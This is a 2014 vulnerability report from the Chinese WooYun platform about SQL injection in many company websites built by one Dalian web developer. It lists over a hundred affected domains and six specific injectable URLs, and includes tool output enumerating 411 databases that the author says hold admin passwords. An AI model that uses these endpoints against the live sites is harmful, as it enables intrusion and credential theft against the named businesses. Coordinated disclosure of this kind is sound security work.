当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086982

漏洞标题:某公司制作的大量网站批量存在SQL注入漏洞 可导致百余旁站沦陷

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2014-12-15 10:45

修复时间:2015-01-29 10:46

公开时间:2015-01-29 10:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-15: 细节已通知厂商并且等待厂商处理中
2014-12-18: 厂商已经确认,细节仅向厂商公开
2014-12-28: 细节向核心白帽子及相关领域专家公开
2015-01-07: 细节向普通白帽子公开
2015-01-17: 细节向实习白帽子公开
2015-01-29: 细节向公众公开

简要描述:

某公司制作的大量网站批量存在SQL注入漏洞 爆出数百数据库 可导致百余旁站沦陷

详细说明:

可能受影响的网站(直接从反查上复制下来的 部分不存在注入 但爆出的数据库涉及)

www.aohuamedical.com	大连澳华有限公司	
www.beifangcom	大连北方分析仪器有限公司	
www.chengjianbeef.com	大连诚健集团	
www.dalianrixin.com	大连日信工艺品有限公司	
www.daliansy.com	大连淞宇制品有限公司	
www.dl-jx.com	大连拉伸膜|大连金信包装制造有限公司	
www.dl-sinic.com	大连欣泽国际贸易有限公司	
www.dlactech.com	艾科科技——微波光电子领域的专家	
www.dlhoney.com	无标题	
www.jinlidafood.com	魔芋厂家|魔芋产品|魔芋供应商|魔芋哪家好|大连金利达食品有…	
www.peanutschina.com	大连平和食品有限公司
www.ru-industry.com	REAL YOU GROUP	
www.zhengoil.com	橡胶加工油|芳烃油|糠醛抽出油-大连正兴石化有限公司	
www.zitenghuayi.com	黎格厨鍋具-不锈钢锅具|进口锅具	
www.dlgoke.com	大连国科机电设备有限公司-电主轴|ACE吸震器缓冲器|滚珠丝…	
www.ckk-tool.com	秀凯超硬刃具(大连)有限公司	
www.dlrfsk.com	便携式数控切割机|悬臂式数控切割机|龙门式数控切割机|台式数…	
www.smeyar.com	大连思美娅服饰有限公司	
www.dlguanghe.com	大连广和农业产品有限公司 - | 大连广和|农业产品|农产…	
www.cnjizhuangdai.com	大连辛星塑料制品有限公司
www.myhezhong.com	大连网站建设|大连微信公众平台|大连营销型网站|合众商道(大…	
www.hanweimetal.com	汉威/汉威金属/汉威刀剑	
www.colour-printing.cn	大连金州彩虹包装有限公司 - 包装袋制造商|手提袋制造商|礼…	
www.dlbaoxiang.cn	铁托盘|不锈钢液体罐|大连宝祥包装制品有限公司	
www.dldjsb.cn	大连顶金通用设备制造有限公司	
www.dlhongya.cn	埃尔泰特	
www.dlxiehe.cn	大连协和门诊	
www.dlyufeng.cn	大连模具|大连冲压件|大连华弘宇峰精密金属有限公司	
www.dongye.cn	大连东冶工程技术有限公司 - 大连东冶建设工程有限公司	
www.xtsc.cn	大连鑫通水产食品有限公司	
www.eurocarparts.com.cn	大连优罗卡汽车用品有限公司	
www.kuoshen.net	清酒|味啉|梅酒|寿司醋-大连阔神生物发酵制品有限公司	
aohuamedical.com	大连澳华有限公司	
chengjianbeef.com	大连诚健集团	
daliansy.com	大连淞宇制品有限公司	
dlactech.com	艾科科技——微波光电子领域的专家	
ru-industry.com	REAL YOU GROUP	
zhengoil.com	橡胶加工油|芳烃油|糠醛抽出油-大连正兴石化有限公司
lengbingqi.com	冷兵器 中国剑 西洋剑 武士刀 小刀 收藏	
colour-printing.cn	大连金州彩虹包装有限公司 - 包装袋制造商|手提袋制造商|礼…	
dlbaoxiang.cn	铁托盘|不锈钢液体罐|大连宝祥包装制品有限公司	
dldjsb.cn	大连顶金通用设备制造有限公司	
dlhongya.cn	埃尔泰特	
dlxiehe.cn	大连协和门诊	
dlyufeng.cn	大连模具|大连冲压件|大连华弘宇峰精密金属有限公司	
xtsc.cn	大连鑫通水产食品有限公司	
yfgl.cn	云峰锅炉采暖设备有限公司
www.cmmsn.net	中国船舶物资供应网	
www.lengbingqi.com	汉威|汉威刀剑|汉威金属|冷兵器论坛|中国剑|西洋剑|武士刀	
www.wd-jiuye.com	万达酒业	
www.dl-dishui.com	梅乃宿|柚子酒|日本果味酒|水果酒-大连滴水贸易有限公司	
www.xinyida.cc	辽宁鑫亿达集团	
www.wd-jiudian.com	万达商务酒店	
www.bld-pcb.com	BLD ELECTRONIC	
www.tanhoy.cn	大连参美原料药有限公司	
www.dlmtck.com	大连美天测控系统有限公司	
www.caihong-printing.com	无标题	
www.dlbenli.com	水产罐头|即食水产品|虾排|冻鱼片-大连本利食品有限公司	
www.dlhoyo.com	PU纸|油漆纸-大连好友装饰材料有限公司	
www.dltrifolia.com	赤玉土|培养土|鸟食-大连群芳园艺有限公司	
kuoshen.net	清酒|味啉|梅酒|寿司醋-大连阔神生物发酵制品有限公司	
siuluvmi.com	Siuluvmi	
www.zhengoil.cn	橡胶加工油|芳烃油|糠醛抽出油-大连正兴石化有限公司	
dlzhengwan.com	工业润滑油|通用锂基润滑油|极压锂基润滑脂|置换型防锈油|真…	
www.dlbh.com.cn	实木定制家具-大连北宏木业有限公司	
www.ricohyc.com	黎格时尚厨锅具	
cmmsn.net	中国船舶物资供应网	
dlxsjx.cn	立车|立式车床|数控立车|多刀机床|大连兴胜机床设备有限公司	
yxohq.com	液力偶合器 偶合器 大连偶合器 耦合器-大连亿鑫液力偶合器有…	
www.dlsanxie.com	大连三协精密模具有限公司-大连冲压	
www.zk-dl.com	大连重矿设备制造有限公司	
caihong-printing.com	无标题	
www.dlzxhg.cn	大连振兴化工厂	
dltcnet.com	大连特产网|水产礼品盒|大连特产加盟	
www.dlcygj.com	加拿大海参|墨西哥海参|加勒比海参|加拿大有机红参|加拿大进…	
mst-dl.com	米司特(大连)工业控制系统有限公司	
www.chinayif.com	大连一峰机电设备有限公司	
www.siuluvmi.com	Siuluvmi	
dlmct.com	大连美宸特环保节能产品有限公司	
www.dlmct.com	大连美宸特环保节能产品有限公司	
myhezhong.com	大连网站建设|大连微信公众平台|大连营销型网站|合众商道(大…	
hd-dal.com	恒达捷亚国际物流(大连)有限公司 - 大连物流公司|大连货代…
dlsanxie.com	大连三协精密模具有限公司-大连冲压	
hanweibladecenter.cn	汉威刀剑- 汉威刀剑,汉威冷兵器论坛,汉威视频站	
www.lj-jc.cn	大连利晶佳成服装有限公司
dlxz.cn	大连烘焙原料|大连西餐餐料|大连餐饮供货|大连修竹贸易有限公…	
www.hanweibladecenter.cn	汉威刀剑- 汉威刀剑,汉威冷兵器论坛,汉威视频站	
www.dl-santa.cn	无烟烧烤炉|日式无烟烧烤炉|日式烧烤炉具|日式无烟烧烤炉具 - 大连三达厨具有限公司	
www.woodsh.cn	轻型木结构|构造材|大连木结构|大连木屋|大连双华木业有限公…	
woodsh.cn	轻型木结构|构造材|大连木结构|大连木屋|大连双华木业有限公…	
china-ymf.com	大连传送带|大连链板|大连托辊|大连驱动台车|大连亿明峰贸易…	
www.dllht.com	现代威亚|雷尼绍|大连力合国际贸易有限公司	
dllht.com	大连现代威亚|雷尼绍|大连力合国际贸易有限公司
zhs.com	施展网络_施展网络_施展网络_施展网络	
www.china-goke.com	大连国科机电设备有限公司-电主轴|ACE吸震器缓冲器|滚珠丝…	
www.blueandgreen.com.cn	大连桢盈环保科技|环保骨灰盒|导电板|环保产品|植物纤维|桢…	
www.dljqmy.com	大连佳琦贸易有限公司	
blueandgreen.com.cn	大连桢盈环保科技|环保骨灰盒|导电板|环保产品|植物纤维|桢…	
dlsanlun.com	大连三轮铸造设备有限公司	
www.dlsanlun.com	大连三轮铸造设备有限公司
zyjccom	大连茶馆|大连市西岗区紫玉金茶茶楼	
hanweimetal.com	汉威/汉威金属/汉威刀剑	
www.zhs.com	施展网络_施展网络_施展网络_施展网络	
www.dltcnet.com	大连特产网|水产礼品盒|大连特产加盟	
dlcygj.com	加拿大海参|墨西哥海参|加勒比海参|加拿大有机红参|加拿大进…	
www.zhaohejukun.com	大连昭和巨坤,大连汽车零部件加工,大连机械加工,大连白钢零件…
guojianjiliang.com	英示|马尔量具|蔡司三坐标|三丰量具量仪|大连国检计量有限公…	
www.dl-fw.com	管道连接器|管道修补器|大连方伟机械制造有限公司	
dlszport.com	大连神洲港口机械设备有限公司	
dfnz.net	大连东方农庄有限公司	
dlchuanqi.com	大连电镀|大连传起化学镀有限公司	
www.jiangjiang.net.cn	江江网免费留学
www.yxohq.com	液力偶合器 偶合器 大连偶合器 耦合器-大连亿鑫液力偶合器有…	
www.ygrz.com.cn	大连优格生活装饰有限公司	
www.dltdzg.com	网纹辊 镜面辊 辊加工 大连鑫腾达制辊有限公司	
www.yian-dl.com	大连易安自动化设备有限公司	
www.berfect.com.cn	bray|博雷|abo阀门|e+h|大连博非特自动化工程有限…	
www.p-yuan.com	东北特钢|大连特钢|浦元特钢(大连)有限公司 - 浦元特钢	
com	大连空运物流哪家好|大连航空物流|空运物流|货运代理|大连航空物流公司|大连空运物流公司|大	
dlrfsk.com	便携式数控切割机|悬臂式数控切割机|龙门式数控切割机|台式数…	
dlyouyuan.com	大连友源食品有限公司
www.dllianghua.com	大连良华食品有限公司	
www.dlwdy.cn	大连万大元食品有限公司
kateeh.com	电采暖壁挂炉|热式电热水器|腾凯特电锅炉|大连凯特电热科技有…	
www.hkyeya.cn	大连宏逵液压润滑设备制造有限公司	
www.lihaoshuo.com	大连西服|大连西服供应商|大连丽豪硕服装辅料有限公司	
www.dlrazer.com	高倍得|丁虫腈|克草胺|大连瑞泽|大连瑞泽农药股	
peanutschina.cn	大连平和食品有限公司
dljl.cc	大连金菱新型门窗制品有限公司	
dl-jx.com	大连拉伸膜|大连金信包装制造有限公司	
xinke-cn.com	新柯油烟机,油烟机	
airtight-pump.com	埃尔泰特	
dlshangdao.com	法国养猪项目|双头弯管机|大连上岛科技发展有限公司	
dlguanghe.com	大连广和农业产品有限公司 - | 大连广和|农业产品|农产…	
dlrazer.com	高倍得|丁虫腈|克草胺|大连瑞泽|大连瑞泽农药股份有限公司
ybcwcom	大连代办注册公司|大连亿佰财务管理有限公司	
www.worldfresh.cn	五洲一鲜—生鲜进口食品网	
WWW.CATLITTER.COM.CN	kind trading (dalian) co.,ltd	
www.sftcom	大连斯扶特农业科技有限公司	
aljfloor.cn	大连澳俐嘉木业有限公司	
dlshijia.com	大连世佳国际贸易有限公司 | 世佳贸易 | 世佳国际贸易 |…	
www.kateeh.com	电采暖壁挂炉|热式电热水器|腾凯特电锅炉|大连凯特电热科技有…	
www.dl-jd.com	大连健达塑料机械有限公司	
dlhuayang.com	大连华阳密封股份有限公司	
sanheess.com	大连圣汉斯油脂贸易有限公司	
www.dlhaida.net	大连海达玻璃集团有限公司	
dlhaida.net	大连海达玻璃集团有限公司	
www.mst-dl.cn	米司特(大连)工业控制系统有限公司-主令控制器	
lihaoshuo.com	大连西服|大连西服供应商|大连丽豪硕服装辅料有限公司	
dlsundly.com	大连善德来生活用品有限公司 - 大连善德来生活用品有限公司


以下枚举几例 仅供cncert复现测试 其他人员请勿进行利用破坏

http://aljfloor.cn/list.php?id=1
http://www.yian-dl.com/list.php?id=5
http://www.dlbenli.com/list.php?id=5
http://www.dlhongya.cn/list.php?id=3
http://www.jinlidafood.com/list.php?id=4
http://www.eurocarparts.com.cn/list.php?id=5


可一次性爆出数百个数据库,其中包含后台密码等敏感数据,可导致百余旁站沦陷

漏洞证明:

2.jpg


available databases [411]:
[*] 210yiyuan
[*] aike
[*] aike1
[*] aina
[*] antechuanbo
[*] aohuajinchukou
[*] aohuakairui
[*] aolijia
[*] baifangde
[*] baihe
[*] baihualianggujiagongyouxianggongsi
[*] baiqiao
[*] baolin
[*] baolindianlan
[*] baoxiang
[*] bcsp
[*] beichengshengwu
[*] beihong
[*] beishou
[*] beishoudata
[*] beishougydata
[*] benlida
[*] benlida1
[*] benlishipin
[*] berfect
[*] bffxyq
[*] bobangdata
[*] bofanjinchukoumaoyi
[*] boruida
[*] boshi
[*] caihongbaozhuang
[*] caijie
[*] case_xurijixie
[*] cenlongdata
[*] chbz
[*] chengjiannew
[*] chuangzao
[*] chuanqi
[*] chuanqihuagongdu
[*] chuanyang1
[*] chuanyongguolu
[*] cszdh
[*] daanguoji
[*] daannew
[*] daludi
[*] daqing
[*] db1109_jyshw
[*] dehuiguoji
[*] deyue
[*] dingfeng
[*] dingji
[*] dingjin
[*] dishui
[*] dlblwytjlb
[*] dlhongjing
[*] dljinyishangye
[*] dljmgjdata
[*] dlpuzhouguoji
[*] dlruidiman
[*] dlshangkaijingmimjyxgs
[*] donganzidongkongzhiyxgs
[*] dongfangnongzhuang
[*] dongfeite
[*] donghang
[*] donghangyun
[*] donglin
[*] dongsheng
[*] dongxiao
[*] dongye
[*] dongyouguoji
[*] duolan
[*] duonaiyingyongcailiao
[*] experience
[*] fanda
[*] fangwei
[*] fanyatai2_bak
[*] fengchanpin
[*] fengchen
[*] fengchenjixieyouxiangongsi
[*] fenghua
[*] fengjin
[*] fenglianlianggu
[*] fengqitong
[*] fuban
[*] fuchuan
[*] fude
[*] fuhuiwenquansz
[*] fushisuliao
[*] fuxingshuichan
[*] fuyuangongye
[*] gaite
[*] gaitekeji
[*] gaomai
[*] gaoyangfamen
[*] ghncp
[*] gkjdsb
[*] guojian
[*] haida
[*] haideshipin
[*] haijienuode
[*] hailan
[*] hailin
[*] hanfeng
[*] hantai
[*] hanweidaojian
[*] hanweidata
[*] hanweiluntan
[*] haoyou
[*] haoyouchukou
[*] haoyouzs
[*] hengdajieya
[*] henghui
[*] hengqichang
[*] hengtianjingmi
[*] hezhili
[*] hezhong
[*] hezhongshangdao
[*] hfspshopdata
[*] hongcheng
[*] hongdamiaoye
[*] hongheyuan
[*] honghuishipin
[*] hongjunyuan
[*] hongjuyuanjxyxgs
[*] hongkui
[*] hongshun
[*] hongxiangqiche
[*] hongxin
[*] hongxinwangju
[*] hongya
[*] hongyu
[*] huachenmaoyi
[*] huafushipin
[*] huahong
[*] huahongyufeng
[*] huangchuanshipin
[*] huanjia
[*] huanqiudata
[*] huanzhou
[*] huaqishipinyouxiangs
[*] huarixin
[*] huaruitemuye
[*] huasen
[*] huayangmifeng
[*] huayi
[*] huida
[*] huigang
[*] huipeng
[*] huitong
[*] huixin
[*] information_schema
[*] iwebmall
[*] iwebmall2
[*] jiaer
[*] jiahe
[*] jiahui
[*] jiandasuliao
[*] jiangjiangliuxue
[*] jiangshan
[*] jiaqimoyi
[*] jiayu
[*] jiayuandianzi
[*] jieshun
[*] jinda
[*] jinghuamuju
[*] jinhuayuan
[*] jinli
[*] jinlida
[*] jinling
[*] jinlixiangjiao
[*] jinmei1
[*] jinong
[*] jinshan
[*] jintashipin
[*] jinxin
[*] junhuidata
[*] kaite
[*] kaoshimotuo
[*] kedundata
[*] keli
[*] klcjft
[*] kuoshen
[*] kuoshente
[*] landaidata3
[*] lanmasldata
[*] lantianjingmi
[*] lasipaite
[*] leshixiaochu
[*] letian
[*] lhgjmy
[*] lian
[*] liangan
[*] lianghua
[*] lianhuadata
[*] lianyang
[*] lihaoshuo
[*] lihaoshuo1
[*] lijingjiacheng
[*] liqian
[*] liqiandata
[*] liqun
[*] liwang
[*] liwangshizhuang
[*] longfengshan
[*] longqimoyiyouxiangongsi
[*] lvyuan
[*] maite
[*] meichente
[*] meijing
[*] meiqingshidai
[*] meisen
[*] meisitegongyekzxt
[*] meitian
[*] mingchuan_ccd
[*] mingjiadianzi
[*] mingtaizhoucheng
[*] misite
[*] mouping
[*] muping
[*] muyuan
[*] myhezhong
[*] mysql
[*] nachuadata
[*] newmeisenguojimoyi
[*] nuopaike
[*] nuoshi
[*] paigeshiyou
[*] peize
[*] pengma
[*] performance_schema
[*] pgdw
[*] phpmyadmin
[*] pinghe
[*] pingye
[*] pinyipin
[*] project_demo
[*] project_zhengwanmaoyi
[*] puankeji
[*] pudaguojimaoyi
[*] purongni
[*] puruima
[*] puyuantegang
[*] puzhoudata
[*] pytg
[*] qfyy
[*] qianchenggaozhong
[*] qianchengkouqiang
[*] qimei
[*] qiyangyang
[*] quanyou
[*] reiyou_dlsyb
[*] reiyou_hgsyb
[*] reiyou_spsyb
[*] rfsk
[*] rixin
[*] rixin1
[*] rixingongyi
[*] ruidemei
[*] ruidemei_old
[*] ruixiangyuan
[*] ruize
[*] runxiang
[*] runxiangyuan
[*] sanda
[*] sanlun
[*] sanying
[*] sanyoujiajuyouxiangongsi
[*] sentai
[*] shandelai
[*] shangdao
[*] shangdaokejifzyxgs
[*] shengangmaoyi
[*] shengfang
[*] shengfushuichan
[*] shenghansi
[*] shenghua
[*] shengyuan
[*] shenmeiyuanliao
[*] shenzhougangkou
[*] shidaiwanheng
[*] shijia
[*] shongyujinshu
[*] shop_demo
[*] shuanghuamuye
[*] sifute
[*] simeiya
[*] spzyw
[*] sunfajtdata
[*] sunfaqjdata
[*] sxjmmj
[*] taiguang
[*] taihe
[*] taiqi1
[*] test
[*] testdata
[*] thinkshop
[*] thinkshop2
[*] thinkshop_anli
[*] tiandi
[*] tiandilongxing
[*] tianlihe
[*] tongda
[*] tongshang
[*] tongyixing
[*] wanchengjmy
[*] wanda
[*] wandajituan
[*] wandajiudian
[*] wandayuan
[*] wandayuanqiye
[*] wandayuanshipinyxgs
[*] wanfa
[*] wanglin
[*] wanjia
[*] wanxin
[*] wanyi
[*] weikerui
[*] weiyide
[*] weiyimuye
[*] wlnzmr
[*] wofeng
[*] wucaiguoji
[*] wuhuanguoji
[*] wuzhoushopdata
[*] wxscwz
[*] xfw
[*] xhmj
[*] xiangcunguojimaoyiyxgs
[*] xiangyu
[*] xiaolin
[*] xiaoquan
[*] xiehemenzhen
[*] xima
[*] xincheng
[*] xinglijinshu
[*] xingshengjixie
[*] xinhong
[*] xinhongdata
[*] xinhuanian
[*] xinliguoji
[*] xinlihua
[*] xinlongyuan
[*] xinrongxin
[*] xinsen
[*] xinshangwhcmyxgs
[*] xintengda
[*] xintongshuichanpin
[*] xinya
[*] xinyuanwujin
[*] xinyuejixie
[*] xinzeguoji
[*] xinzhi
[*] xinzhinew
[*] xinzhongyuan
[*] xiukai
[*] xiuzu
[*] xiyangfangshui
[*] xuanyang
[*] xueying
[*] xuhe
[*] xurijixie
[*] xxsl
[*] yanshianli
[*] yian
[*] yibaicaihuiguanliyxgc
[*] yifengjidian
[*] yimingfeng
[*] yingshanfangong
[*] yingyuan
[*] yisida
[*] yixin
[*] ykfjsy
[*] ymksdata
[*] yongdajinshu
[*] yongpeng
[*] youge
[*] youluoka
[*] younaite
[*] youyuan
[*] ysshopdata
[*] yuehui
[*] yuhe
[*] yunfeng
[*] yunhang
[*] yutaichongxin
[*] yutanggjmyyxgs
[*] yuyijixie
[*] zhaohejixie1
[*] zhaohejk
[*] zhengwan
[*] zhengxing
[*] zhenxing
[*] zhihuiyuye
[*] zhongcun
[*] zhongda
[*] zhongjing
[*] zhongkuang
[*] zhongmaite
[*] zhongsi
[*] zhongyuan
[*] zhuyoulinye
[*] zhuyu
[*] ziteng
[*] ziteng_guo
[*] ziteng_huayi
[*] ziteng_julebu
[*] zt60s1_db
[*] zuanjidata
[*] zuanjidata22
[*] zuilanshizhuang
[*] zyjc


内含后台密码等敏感数据

3.jpg

修复方案:

过滤 注意分配数据库权限

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2014-12-18 20:24

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商(或网站管理单位)的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-12-24 18:13 | 黑色二进制 ( 路人 | Rank:5 漏洞数:3 | 一只小白)

    ..